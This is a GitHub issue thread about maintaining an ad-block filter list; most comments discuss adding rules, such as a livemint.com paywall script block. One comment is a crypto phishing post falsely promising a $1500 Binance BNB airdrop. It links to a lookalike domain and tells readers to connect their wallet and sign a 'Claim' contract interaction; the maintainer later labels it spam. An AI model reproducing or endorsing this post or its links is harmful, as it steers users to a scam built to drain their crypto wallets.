### ISSUE TITLE
todo

### ISSUE THREAD

**Issue by liamengland1** [liamengland1/miscfilters#1]

**Comment by llacb47** [comment]
https://github.com/ryanbr/fanboy-adblock/blob/master/enhancedstats-addon.txt#L493-L556

**Comment by llacb47** [comment]
add gannett to antipaywall

waiting on `cookie-remover`

**Comment by chirag127** [comment]
please consider adding ||livemint.com/__js/lm_subscription_v4.js$domain=livemint.com to the filter list.

**Comment by llacb47** [comment]
> 
> 
> please consider adding ||livemint.com/__js/lm_subscription_v4.js$domain=livemint.com to the filter list.

done @chirag127 https://github.com/llacb47/miscfilters/commit/d9a6abb42b3f7f3c8abe0dc6d62841c35225cf8f

**Comment by Rockpods** [comment]
> waiting on `cookie-remover`

That has been added at the time of writing.

**Comment by Idris933** [comment]
# Binance Airdrop Guide: Claim Your $1500 in BNB Now!

🎉 Congratulations! You've won a share of the $1.500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. But that's not all—connect now, and you'll instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://i.ytimg.com/vi/PFhGDyXstas/maxresdefault.jpg)](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://bnbairdrop.bianciconectes.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1.500k in BNB! Plus, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, seize the chance to win up to $20,000—it's your golden opportunity!


Winners: @CJamesKeller, @raexune, @Neotamandua, @5ushrep0Z, @chrisleekr, @uony, @lineuve

**Comment by liamengland1** [comment]
Apologies if you get pinged. It was crypto spam.
